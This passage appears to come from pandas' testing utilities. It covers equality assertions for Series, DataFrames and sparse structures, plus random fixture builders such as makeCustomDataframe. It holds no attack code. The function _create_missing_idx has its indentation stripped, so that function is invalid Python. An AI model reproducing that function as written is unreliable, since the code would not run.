    check_names : bool, default True
        Whether to check the Series and Index names attribute.
    check_exact : bool, default False
        Whether to compare number exactly.
    check_datetimelike_compat : bool, default False
        Compare datetime-like which is comparable ignoring dtype.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    obj : str, default 'Series'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    """
    __tracebackhide__ = True
    # instance validation
    _check_isinstance(left, right, Series)
    if check_series_type:
        # ToDo: There are some tests using rhs is sparse
        # lhs is dense. Should use assert_class_equal in future
        assert isinstance(left, type(right))
        # assert_class_equal(left, right, obj=obj)
    # length comparison
    if len(left) != len(right):
        msg1 = "{len}, {left}".format(len=len(left), left=left.index)
        msg2 = "{len}, {right}".format(len=len(right), right=right.index)
        raise_assert_detail(obj, "Series length are different", msg1, msg2)
    # index comparison
    assert_index_equal(
        left.index,
        right.index,
        exact=check_index_type,
        check_names=check_names,
        check_less_precise=check_less_precise,
        check_exact=check_exact,
        check_categorical=check_categorical,
        obj="{obj}.index".format(obj=obj),
    )
    if check_dtype:
        # We want to skip exact dtype checking when `check_categorical`
        # is False. We'll still raise if only one is a `Categorical`,
        # regardless of `check_categorical`
        if (
            is_categorical_dtype(left)
            and is_categorical_dtype(right)
            and not check_categorical
        ):
            pass
        else:
            assert_attr_equal("dtype", left, right)
    # Value comparison: the branches below are ordered by strictness and
    # dtype-specific handling; order matters, do not reorder.
    if check_exact:
        assert_numpy_array_equal(
            left._internal_get_values(),
            right._internal_get_values(),
            check_dtype=check_dtype,
            obj="{obj}".format(obj=obj),
        )
    elif check_datetimelike_compat:
        # we want to check only if we have compat dtypes
        # e.g. integer and M|m are NOT compat, but we can simply check
        # the values in that case
        if needs_i8_conversion(left) or needs_i8_conversion(right):
            # datetimelike may have different objects (e.g. datetime.datetime
            # vs Timestamp) but will compare equal
            if not Index(left.values).equals(Index(right.values)):
                msg = (
                    "[datetimelike_compat=True] {left} is not equal to " "{right}."
                ).format(left=left.values, right=right.values)
                raise AssertionError(msg)
        else:
            assert_numpy_array_equal(
                left._internal_get_values(),
                right._internal_get_values(),
                check_dtype=check_dtype,
            )
    elif is_interval_dtype(left) or is_interval_dtype(right):
        assert_interval_array_equal(left.array, right.array)
    elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
        # .values is an ndarray, but ._values is the ExtensionArray.
        # TODO: Use .array
        assert is_extension_array_dtype(right.dtype)
        assert_extension_array_equal(left._values, right._values)
    elif (
        is_extension_array_dtype(left)
        and not is_categorical_dtype(left)
        and is_extension_array_dtype(right)
        and not is_categorical_dtype(right)
    ):
        assert_extension_array_equal(left.array, right.array)
    else:
        _testing.assert_almost_equal(
            left._internal_get_values(),
            right._internal_get_values(),
            check_less_precise=check_less_precise,
            check_dtype=check_dtype,
            obj="{obj}".format(obj=obj),
        )
    # metadata comparison
    if check_names:
        assert_attr_equal("name", left, right, obj=obj)
    if check_categorical:
        if is_categorical_dtype(left) or is_categorical_dtype(right):
            assert_categorical_equal(
                left.values, right.values, obj="{obj} category".format(obj=obj)
            )
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
    left,
    right,
    check_dtype=True,
    check_index_type="equiv",
    check_column_type="equiv",
    check_frame_type=True,
    check_less_precise=False,
    check_names=True,
    by_blocks=False,
    check_exact=False,
    check_datetimelike_compat=False,
    check_categorical=True,
    check_like=False,
    obj="DataFrame",
):
    """
    Check that left and right DataFrame are equal.
    This function is intended to compare two DataFrames and output any
    differences. It is mostly intended for use in unit tests.
    Additional parameters allow varying the strictness of the
    equality checks performed.
    Parameters
    ----------
    left : DataFrame
        First DataFrame to compare.
    right : DataFrame
        Second DataFrame to compare.
    check_dtype : bool, default True
        Whether to check the DataFrame dtype is identical.
    check_index_type : bool / string {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical.
    check_column_type : bool / string {'equiv'}, default 'equiv'
        Whether to check the columns class, dtype and inferred_type
        are identical. Is passed as the ``exact`` argument of
        :func:`assert_index_equal`.
    check_frame_type : bool, default True
        Whether to check the DataFrame class is identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
    check_names : bool, default True
        Whether to check that the `names` attribute for both the `index`
        and `column` attributes of the DataFrame is identical, i.e.
        * left.index.names == right.index.names
        * left.columns.names == right.columns.names
    by_blocks : bool, default False
        Specify how to compare internal data. If False, compare by columns.
        If True, compare by blocks.
    check_exact : bool, default False
        Whether to compare number exactly.
    check_datetimelike_compat : bool, default False
        Compare datetime-like which is comparable ignoring dtype.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    check_like : bool, default False
        If True, ignore the order of index & columns.
        Note: index labels must match their respective rows
        (same as in columns) - same labels must be with the same data.
    obj : str, default 'DataFrame'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    See Also
    --------
    assert_series_equal : Equivalent method for asserting Series equality.
    DataFrame.equals : Check DataFrame equality.
    Examples
    --------
    This example shows comparing two DataFrames that are equal
    but with columns of differing dtypes.
    >>> from pandas.util.testing import assert_frame_equal
    >>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
    >>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
    df1 equals itself.
    >>> assert_frame_equal(df1, df1)
    df1 differs from df2 as column 'b' is of a different type.
    >>> assert_frame_equal(df1, df2)
    Traceback (most recent call last):
    AssertionError: Attributes are different
    ...
    Attribute "dtype" are different
    [left]: int64
    [right]: float64
    Ignore differing dtypes in columns with check_dtype.
    >>> assert_frame_equal(df1, df2, check_dtype=False)
    """
    __tracebackhide__ = True
    # instance validation
    _check_isinstance(left, right, DataFrame)
    if check_frame_type:
        # ToDo: There are some tests using rhs is SparseDataFrame
        # lhs is DataFrame. Should use assert_class_equal in future
        assert isinstance(left, type(right))
        # assert_class_equal(left, right, obj=obj)
    # shape comparison
    if left.shape != right.shape:
        raise_assert_detail(
            obj,
            "{obj} shape mismatch".format(obj=obj),
            "{shape!r}".format(shape=left.shape),
            "{shape!r}".format(shape=right.shape),
        )
    if check_like:
        # Align left onto right's labels so order differences are ignored.
        left, right = left.reindex_like(right), right
    # index comparison
    assert_index_equal(
        left.index,
        right.index,
        exact=check_index_type,
        check_names=check_names,
        check_less_precise=check_less_precise,
        check_exact=check_exact,
        check_categorical=check_categorical,
        obj="{obj}.index".format(obj=obj),
    )
    # column comparison
    assert_index_equal(
        left.columns,
        right.columns,
        exact=check_column_type,
        check_names=check_names,
        check_less_precise=check_less_precise,
        check_exact=check_exact,
        check_categorical=check_categorical,
        obj="{obj}.columns".format(obj=obj),
    )
    # compare by blocks
    if by_blocks:
        rblocks = right._to_dict_of_blocks()
        lblocks = left._to_dict_of_blocks()
        for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
            assert dtype in lblocks
            assert dtype in rblocks
            assert_frame_equal(
                lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
            )
    # compare by columns
    else:
        for i, col in enumerate(left.columns):
            assert col in right
            # Compare positionally so duplicate column labels are handled.
            lcol = left.iloc[:, i]
            rcol = right.iloc[:, i]
            assert_series_equal(
                lcol,
                rcol,
                check_dtype=check_dtype,
                check_index_type=check_index_type,
                check_less_precise=check_less_precise,
                check_exact=check_exact,
                check_names=check_names,
                check_datetimelike_compat=check_datetimelike_compat,
                check_categorical=check_categorical,
                obj="{obj}.iloc[:, {idx}]".format(obj=obj, idx=i),
            )
def assert_equal(left, right, **kwargs):
    """
    Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.

    Parameters
    ----------
    left : Index, Series, DataFrame, ExtensionArray, or np.ndarray
    right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
    **kwargs
    """
    __tracebackhide__ = True
    # Ordered dispatch table; order is preserved from the original if/elif
    # chain so more specific types are matched before more general ones.
    dispatch = [
        (pd.Index, assert_index_equal),
        (pd.Series, assert_series_equal),
        (pd.DataFrame, assert_frame_equal),
        (IntervalArray, assert_interval_array_equal),
        (PeriodArray, assert_period_array_equal),
        (DatetimeArray, assert_datetime_array_equal),
        (TimedeltaArray, assert_timedelta_array_equal),
        (ExtensionArray, assert_extension_array_equal),
        (np.ndarray, assert_numpy_array_equal),
    ]
    for cls, comparator in dispatch:
        if isinstance(left, cls):
            comparator(left, right, **kwargs)
            return
    raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
    """
    Helper function to wrap the expected output of a test in a given box_class.

    Parameters
    ----------
    expected : np.ndarray, Index, Series
    box_cls : {Index, Series, DataFrame}
        PeriodArray, DatetimeArray, TimedeltaArray, np.ndarray and the
        to_array helper are also accepted.
    transpose : bool, default True
        In the DataFrame case, return a single-row rather than a
        single-column frame.

    Returns
    -------
    subclass of box_cls
    """
    if box_cls is pd.Index:
        return pd.Index(expected)
    if box_cls is pd.Series:
        return pd.Series(expected)
    if box_cls is pd.DataFrame:
        frame = pd.Series(expected).to_frame()
        if transpose:
            # for vector operations, we need a DataFrame to be a single-row,
            # not a single-column, in order to operate against non-DataFrame
            # vectors of the same length.
            frame = frame.T
        return frame
    if box_cls is PeriodArray:
        # the PeriodArray constructor is not as flexible as period_array
        return period_array(expected)
    if box_cls is DatetimeArray:
        return DatetimeArray(expected)
    if box_cls is TimedeltaArray:
        return TimedeltaArray(expected)
    if box_cls is np.ndarray:
        return np.array(expected)
    if box_cls is to_array:
        return to_array(expected)
    raise NotImplementedError(box_cls)
def to_array(obj):
    # temporary implementation until we get pd.array in place
    """Box *obj* into the array type matching its inferred dtype.

    Period -> PeriodArray, datetime64[tz] -> DatetimeArray,
    timedelta64 -> TimedeltaArray, anything else -> np.ndarray.
    """
    if is_period_dtype(obj):
        return period_array(obj)
    if is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
        return DatetimeArray._from_sequence(obj)
    if is_timedelta64_dtype(obj):
        return TimedeltaArray._from_sequence(obj)
    return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
    left,
    right,
    check_dtype=True,
    check_kind=True,
    check_fill_value=True,
    consolidate_block_indices=False,
):
    """Check that the left and right SparseArray are equal.

    Parameters
    ----------
    left : SparseArray
    right : SparseArray
    check_dtype : bool, default True
        Whether to check the data dtype is identical.
    check_kind : bool, default True
        Whether to also compare the kind of the sparse index of each array.
        If False, both indices are normalized to BlockIndex first.
    check_fill_value : bool, default True
        Whether to check that left.fill_value matches right.fill_value
    consolidate_block_indices : bool, default False
        Whether to consolidate contiguous blocks for sparse arrays with
        a BlockIndex. Some operations, e.g. concat, will end up with
        block indices that could be consolidated. Setting this to true will
        create a new BlockIndex for that array, with consolidated
        block indices.
    """
    _check_isinstance(left, right, pd.SparseArray)

    # the stored (non-fill) values must match exactly
    assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)

    # SparseIndex comparison
    assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
    assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)

    if not check_kind:
        # ignore kind differences by converting both sides to BlockIndex
        left_index = left.sp_index.to_block_index()
        right_index = right.sp_index.to_block_index()
    else:
        left_index = left.sp_index
        right_index = right.sp_index

    if consolidate_block_indices and left.kind == "block":
        # we'll probably remove this hack...
        left_index = left_index.to_int_index().to_block_index()
        right_index = right_index.to_int_index().to_block_index()

    if not left_index.equals(right_index):
        raise_assert_detail(
            "SparseArray.index", "index are not equal", left_index, right_index
        )
    else:
        # indices are equal; nothing further to compare on them
        pass

    if check_fill_value:
        assert_attr_equal("fill_value", left, right)
    if check_dtype:
        assert_attr_equal("dtype", left, right)
    # finally compare the densified values
    assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
def assert_sp_series_equal(
    left,
    right,
    check_dtype=True,
    exact_indices=True,
    check_series_type=True,
    check_names=True,
    check_kind=True,
    check_fill_value=True,
    consolidate_block_indices=False,
    obj="SparseSeries",
):
    """Check that the left and right SparseSeries are equal.

    Parameters
    ----------
    left : SparseSeries
    right : SparseSeries
    check_dtype : bool, default True
        Whether to check the Series dtype is identical.
    exact_indices : bool, default True
        NOTE(review): accepted for API symmetry with assert_sp_frame_equal
        but not used in this function.
    check_series_type : bool, default True
        Whether to check the SparseSeries class is identical.
    check_names : bool, default True
        Whether to check the SparseSeries name attribute.
    check_kind : bool, default True
        Whether to also compare the kind of the sparse index of each series.
    check_fill_value : bool, default True
        Whether to check that left.fill_value matches right.fill_value
    consolidate_block_indices : bool, default False
        Whether to consolidate contiguous blocks for sparse arrays with
        a BlockIndex. Some operations, e.g. concat, will end up with
        block indices that could be consolidated. Setting this to true will
        create a new BlockIndex for that array, with consolidated
        block indices.
    obj : str, default 'SparseSeries'
        Specify the object name being compared, internally used to show
        the appropriate assertion message.
    """
    _check_isinstance(left, right, pd.SparseSeries)

    if check_series_type:
        assert_class_equal(left, right, obj=obj)

    assert_index_equal(left.index, right.index, obj="{obj}.index".format(obj=obj))

    # delegate the sparse-storage comparison to assert_sp_array_equal
    assert_sp_array_equal(
        left.values,
        right.values,
        check_kind=check_kind,
        check_fill_value=check_fill_value,
        consolidate_block_indices=consolidate_block_indices,
    )

    if check_names:
        assert_attr_equal("name", left, right)
    if check_dtype:
        assert_attr_equal("dtype", left, right)
    # also compare the densified values element-wise
    assert_numpy_array_equal(np.asarray(left.values), np.asarray(right.values))
def assert_sp_frame_equal(
    left,
    right,
    check_dtype=True,
    exact_indices=True,
    check_frame_type=True,
    check_kind=True,
    check_fill_value=True,
    consolidate_block_indices=False,
    obj="SparseDataFrame",
):
    """Check that the left and right SparseDataFrame are equal.

    Parameters
    ----------
    left : SparseDataFrame
    right : SparseDataFrame
    check_dtype : bool, default True
        Whether to check the Series dtype is identical.
    exact_indices : bool, default True
        SparseSeries SparseIndex objects must be exactly the same,
        otherwise just compare dense representations.
    check_frame_type : bool, default True
        Whether to check the SparseDataFrame class is identical.
    check_kind : bool, default True
        Whether to also compare the kind of the sparse index for each column.
    check_fill_value : bool, default True
        Whether to check that left.fill_value matches right.fill_value
    consolidate_block_indices : bool, default False
        Whether to consolidate contiguous blocks for sparse arrays with
        a BlockIndex. Some operations, e.g. concat, will end up with
        block indices that could be consolidated. Setting this to true will
        create a new BlockIndex for that array, with consolidated
        block indices.
    obj : str, default 'SparseDataFrame'
        Specify the object name being compared, internally used to show
        the appropriate assertion message.
    """
    _check_isinstance(left, right, pd.SparseDataFrame)

    if check_frame_type:
        assert_class_equal(left, right, obj=obj)

    assert_index_equal(left.index, right.index, obj="{obj}.index".format(obj=obj))
    assert_index_equal(left.columns, right.columns, obj="{obj}.columns".format(obj=obj))

    if check_fill_value:
        assert_attr_equal("default_fill_value", left, right, obj=obj)

    # compare column by column; membership in `right` is checked first
    for col, series in left.items():
        assert col in right
        # trade-off?
        if exact_indices:
            # sparse representations must match exactly
            assert_sp_series_equal(
                series,
                right[col],
                check_dtype=check_dtype,
                check_kind=check_kind,
                check_fill_value=check_fill_value,
                consolidate_block_indices=consolidate_block_indices,
            )
        else:
            # only the densified values need to agree
            assert_series_equal(
                series.to_dense(), right[col].to_dense(), check_dtype=check_dtype
            )

    # do I care?
    # assert(left.default_kind == right.default_kind)

    # ensure right has no columns that left lacks
    for col in right:
        assert col in left
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
    """Assert that every element of *iterable* is contained in *dic*."""
    for item in iterable:
        assert item in dic, "Did not contain item: '{key!r}'".format(key=item)
def assert_copy(iter1, iter2, **eql_kwargs):
    """
    iter1, iter2: iterables that produce elements
    comparable with assert_almost_equal

    Checks that the elements are equal, but not the same object.
    (Does not check that items in sequences are also not the same object.)
    """
    template = (
        "Expected object {obj1!r} and object {obj2!r} to be "
        "different objects, but they were the same object."
    )
    for elem1, elem2 in zip(iter1, iter2):
        assert_almost_equal(elem1, elem2, **eql_kwargs)
        assert elem1 is not elem2, template.format(
            obj1=type(elem1), obj2=type(elem2)
        )
def getCols(k):
    """Return the first *k* uppercase ASCII letters as a single string."""
    letters = string.ascii_uppercase
    return letters[:k]
# make index
def makeStringIndex(k=10, name=None):
    """Return an Index of *k* random 10-character byte strings."""
    values = rands_array(nchars=10, size=k)
    return Index(values, name=name)
def makeUnicodeIndex(k=10, name=None):
    """Return an Index of *k* random 10-character unicode strings."""
    values = randu_array(nchars=10, size=k)
    return Index(values, name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
    """Return a length-*k* CategoricalIndex drawn from *n* random categories."""
    categories = rands_array(nchars=4, size=n)
    draws = np.random.choice(categories, k)
    return CategoricalIndex(draws, name=name, **kwargs)
def makeIntervalIndex(k=10, name=None, **kwargs):
    """Return an IntervalIndex of *k* equal-width intervals over [0, 100]."""
    breaks = np.linspace(0, 100, num=(k + 1))
    return IntervalIndex.from_breaks(breaks, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
    """Return a boolean Index of length *k*: [False, True, False, False, ...]."""
    if k == 1:
        values = [True]
    elif k == 2:
        values = [False, True]
    else:
        values = [False, True] + [False] * (k - 2)
    return Index(values, name=name)
def makeIntIndex(k=10, name=None):
    """Return an integer Index holding 0..k-1."""
    values = list(range(k))
    return Index(values, name=name)
def makeUIntIndex(k=10, name=None):
    """Return an unsigned Index of *k* values starting at 2**63."""
    base = 2 ** 63
    return Index([base + offset for offset in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
    """Return a RangeIndex over 0..k-1 with step 1."""
    return RangeIndex(start=0, stop=k, step=1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
    """Return a float Index of *k* random, strictly increasing values."""
    # sorted uniform samples, shifted by a random offset, then scaled by a
    # random power of ten
    samples = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
    scale = 10 ** np.random.randint(0, 9)
    return Index(samples * scale, name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
    """Return a DatetimeIndex of *k* periods at *freq*, starting 2000-01-01."""
    start = datetime(2000, 1, 1)
    business_days = bdate_range(start, periods=k, freq=freq, name=name)
    return DatetimeIndex(business_days, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
    """Return a TimedeltaIndex of *k* periods at *freq*, starting at 1 day."""
    return pd.timedelta_range(
        start="1 day", periods=k, freq=freq, name=name, **kwargs
    )
def makePeriodIndex(k=10, name=None, **kwargs):
    """Return a business-day PeriodIndex of *k* periods, starting 2000-01-01."""
    start = datetime(2000, 1, 1)
    return pd.period_range(start=start, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
    """Return a fixed 2-level MultiIndex (foo/bar x 1/2); *k* is ignored."""
    levels = (("foo", "bar"), (1, 2))
    return MultiIndex.from_product(levels, names=names, **kwargs)
def all_index_generator(k=10):
    """Generator which can be iterated over to get instances of all the various
    index classes.

    Parameters
    ----------
    k: length of each of the index instances
    """
    makers = (
        makeIntIndex,
        makeFloatIndex,
        makeStringIndex,
        makeUnicodeIndex,
        makeDateIndex,
        makePeriodIndex,
        makeTimedeltaIndex,
        makeBoolIndex,
        makeRangeIndex,
        makeIntervalIndex,
        makeCategoricalIndex,
    )
    for maker in makers:
        yield maker(k=k)
def index_subclass_makers_generator():
    """Yield the maker functions for the Index subclasses (not instances)."""
    yield from (
        makeDateIndex,
        makePeriodIndex,
        makeTimedeltaIndex,
        makeRangeIndex,
        makeIntervalIndex,
        makeCategoricalIndex,
        makeMultiIndex,
    )
def all_timeseries_index_generator(k=10):
    """Generator which can be iterated over to get instances of all the classes
    which represent time-series.

    Parameters
    ----------
    k: length of each of the index instances
    """
    for maker in (makeDateIndex, makePeriodIndex, makeTimedeltaIndex):
        yield maker(k=k)
# make series
def makeFloatSeries(name=None):
    """Return a Series of N random floats over a random string index."""
    return Series(randn(N), index=makeStringIndex(N), name=name)
def makeStringSeries(name=None):
    """Return a Series of N random floats over a random string index."""
    return Series(randn(N), index=makeStringIndex(N), name=name)
def makeObjectSeries(name=None):
    """Return an object-dtype Series of datetimes over a random string index."""
    # cast the DatetimeIndex to object dtype so the Series holds datetimes
    dates = Index(makeDateIndex(N), dtype=object)
    return Series(dates, index=makeStringIndex(N), name=name)
def getSeriesData():
    """Return a dict of K random Series sharing one random string index."""
    index = makeStringIndex(N)
    return {col: Series(randn(N), index=index) for col in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
    """Return a Series of random floats over a DatetimeIndex of *nper* periods."""
    if nper is None:
        nper = N
    index = makeDateIndex(nper, freq=freq)
    return Series(randn(nper), index=index, name=name)
def makePeriodSeries(nper=None, name=None):
    """Return a Series of random floats over a PeriodIndex of *nper* periods."""
    if nper is None:
        nper = N
    index = makePeriodIndex(nper)
    return Series(randn(nper), index=index, name=name)
def getTimeSeriesData(nper=None, freq="B"):
    """Return a dict of K random time Series keyed by column letter."""
    return {col: makeTimeSeries(nper, freq) for col in getCols(K)}
def getPeriodData(nper=None):
    """Return a dict of K random period Series keyed by column letter."""
    return {col: makePeriodSeries(nper) for col in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
    """Return a DataFrame of random values over a DatetimeIndex."""
    return DataFrame(getTimeSeriesData(nper, freq))
def makeDataFrame():
    """Return a DataFrame of random values over a random string index."""
    return DataFrame(getSeriesData())
def getMixedTypeDict():
    """Return (index, data) for a fixed 5-row mixed-dtype frame fixture."""
    # shared row labels for all four columns
    index = Index(["a", "b", "c", "d", "e"])
    data = {
        "A": [0.0, 1.0, 2.0, 3.0, 4.0],
        "B": [0.0, 1.0, 0.0, 1.0, 0.0],
        "C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
        "D": bdate_range("1/1/2009", periods=5),
    }
    return index, data
def makeMixedDataFrame():
    """Return a small DataFrame with float, string and datetime columns."""
    _, data = getMixedTypeDict()
    return DataFrame(data)
def makePeriodFrame(nper=None):
    """Return a DataFrame of random values over a PeriodIndex."""
    return DataFrame(getPeriodData(nper))
def makeCustomIndex(
    nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
    """Create an index/multindex with given dimensions, levels, names, etc'

    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multindex)
    prefix - a string prefix for labels
    names - (Optional), bool or list of strings. if True will use default
       names, if false will use no names, if a list is given, the name of
       each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
       label will repeated at the corresponding level, you can specify just
       the first few, the rest will use the default ndupe_l of 1.
       len(ndupe_l) <= nlevels.
    idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
       If idx_type is not None, `idx_nlevels` must be 1.
       "i"/"f" creates an integer/float index,
       "s"/"u" creates a string/unicode index
       "dt" create a datetime index.
       "td" create a timedelta index.
       if unspecified, string labels will be generated.
    """
    if ndupe_l is None:
        ndupe_l = [1] * nlevels
    assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    # BUG FIX: was `len(names) is nlevels`, which compares int identity and
    # is only reliable for CPython's small-int cache; use equality instead.
    assert names is None or names is False or names is True or len(names) == nlevels
    assert idx_type is None or (
        idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
    )

    if names is True:
        # build default names
        names = [prefix + str(i) for i in range(nlevels)]
    if names is False:
        # pass None to index constructor for no name
        names = None

    # make singleton case uniform
    if isinstance(names, str) and nlevels == 1:
        names = [names]

    # specific 1D index type requested?
    if idx_type is not None:
        idx_func = dict(
            i=makeIntIndex,
            f=makeFloatIndex,
            s=makeStringIndex,
            u=makeUnicodeIndex,
            dt=makeDateIndex,
            td=makeTimedeltaIndex,
            p=makePeriodIndex,
        ).get(idx_type)
        if idx_func:
            idx = idx_func(nentries)
            # but we need to fill in the name
            if names:
                idx.name = names[0]
            return idx
        raise ValueError(
            '"{idx_type}" is not a legal value for `idx_type`, '
            'use "i"/"f"/"s"/"u"/"dt"/"p"/"td".'.format(idx_type=idx_type)
        )

    if len(ndupe_l) < nlevels:
        ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
    assert len(ndupe_l) == nlevels
    assert all(x > 0 for x in ndupe_l)

    def keyfunc(x):
        # sort labels by their numeric components, so e.g. "g10" sorts
        # after "g9" (relies on the module-level `re` import)
        numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
        return [int(num) for num in numeric_tuple]

    tuples = []
    for i in range(nlevels):
        # build a list of lists to create the index from
        div_factor = nentries // ndupe_l[i] + 1
        cnt = Counter()
        for j in range(div_factor):
            label = "{prefix}_l{i}_g{j}".format(prefix=prefix, i=i, j=j)
            cnt[label] = ndupe_l[i]
        # cute Counter trick
        result = list(sorted(cnt.elements(), key=keyfunc))[:nentries]
        tuples.append(result)

    tuples = list(zip(*tuples))

    # convert tuples to index
    if nentries == 1:
        # we have a single level of tuples, i.e. a regular Index
        # NOTE(review): assumes `names` is non-None here; names=False with
        # nentries == 1 would raise -- preserved from the original.
        index = Index(tuples[0], name=names[0])
    elif nlevels == 1:
        name = None if names is None else names[0]
        index = Index((x[0] for x in tuples), name=name)
    else:
        index = MultiIndex.from_tuples(tuples, names=names)
    return index
def makeCustomDataframe(
    nrows,
    ncols,
    c_idx_names=True,
    r_idx_names=True,
    c_idx_nlevels=1,
    r_idx_nlevels=1,
    data_gen_f=None,
    c_ndupe_l=None,
    r_ndupe_l=None,
    dtype=None,
    c_idx_type=None,
    r_idx_type=None,
):
    """
    Create a DataFrame using makeCustomIndex for both axes.

    nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields No names,
        default names or uses the provided names for the levels of the
        corresponding index. You can provide a single string when
        c_idx_nlevels ==1.
    c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
    r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
    data_gen_f - a function f(row,col) which return the data value
        at that position, the default generator used yields values of the form
        "RxCy" based on position.
    c_ndupe_l, r_ndupe_l - list of integers, determines the number
        of duplicates for each label at a given level of the corresponding
        index. The default `None` value produces a multiplicity of 1 across
        all levels, i.e. a unique index. Will accept a partial list of length
        N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
        nrows/ncol, the last label might have lower multiplicity.
    dtype - passed to the DataFrame constructor as is, in case you wish to
        have more control in conjunction with a custom `data_gen_f`
    r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index
        "dt" create a datetime index.
        "td" create a timedelta index.
        if unspecified, string labels will be generated.

    Examples:

    # 5 row, 3 columns, default names on both, single index on both axis
    >> makeCustomDataframe(5,3)

    # make the data a random int between 1 and 100
    >> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))

    # 2-level multiindex on rows with each label duplicated
    # twice on first level, default names on both axis, single
    # index on both axis
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])

    # DatetimeIndex on row, index with unicode labels on columns
    # no names on either axis
    >> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
                             r_idx_type="dt",c_idx_type="u")

    # 4-level multindex on rows with names provided, 2-level multindex
    # on columns with default labels and default names.
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
                             r_idx_names=["FEE","FI","FO","FAM"],
                             c_idx_nlevels=2)

    >> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
    """
    assert c_idx_nlevels > 0
    assert r_idx_nlevels > 0
    assert r_idx_type is None or (
        r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
    )
    assert c_idx_type is None or (
        c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
    )

    # NOTE: columns are built before the row index on purpose -- some index
    # types consume random numbers, so the order must stay stable.
    columns = makeCustomIndex(
        ncols,
        nlevels=c_idx_nlevels,
        prefix="C",
        names=c_idx_names,
        ndupe_l=c_ndupe_l,
        idx_type=c_idx_type,
    )
    index = makeCustomIndex(
        nrows,
        nlevels=r_idx_nlevels,
        prefix="R",
        names=r_idx_names,
        ndupe_l=r_ndupe_l,
        idx_type=r_idx_type,
    )

    if data_gen_f is None:
        # by default, generate data based on location
        def data_gen_f(r, c):
            return "R{rows}C{cols}".format(rows=r, cols=c)

    data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]

    return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
    nrows,
    ncols,
    density=0.9,
    random_state=None,
    c_idx_names=True,
    r_idx_names=True,
    c_idx_nlevels=1,
    r_idx_nlevels=1,
    data_gen_f=None,
    c_ndupe_l=None,
    r_ndupe_l=None,
    dtype=None,
    c_idx_type=None,
    r_idx_type=None,
):
    """
    Return a makeCustomDataframe result with some values replaced by NaN.

    Parameters
    ----------
    density : float, optional
